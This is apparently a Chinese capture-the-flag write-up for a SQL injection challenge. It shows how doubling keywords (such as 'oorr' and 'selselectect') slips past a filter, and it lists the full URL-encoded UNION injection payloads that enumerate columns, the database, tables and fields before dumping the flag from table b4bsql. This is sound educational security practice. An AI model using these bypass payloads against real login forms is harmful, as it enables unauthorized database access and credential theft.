這個題目比上次多了一點過濾,但也就一點,可以用雙寫繞過。
這裏構造oorr,因爲會過濾掉中間那個or,然後語句就變爲了1' or 1=1#
還是沒變,賬號是admin。接下來開始爆字段。
?username=admin&password=1'+oorrder+bbyy+1#
這裏輸入時候的空格在url會變成加號
當order by 4的時候報錯,字段數爲3.
開始爆數據庫名:
?username=admin&password=1%27+ununionion+selselectect+1%2C2%2Cdatabase%28%29%23
開始爆表:
?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(table_name)%20frfromom%20infoorrmation_schema.tables%20whwhereere%20table_schema%3Ddatabase()%23
爆字段
?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(column_name)%20frfromom%20infoorrmation_schema.columns%20whwhereere%20table_schema%3Ddatabase()%20anandd%20table_name%3D%27b4bsql%27%23
爆flag:
?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(passwoorrd)%20frfromom%20b4bsql%23
flag{15557f52-8110-4c9a-8993-3f6c49e5ffc9}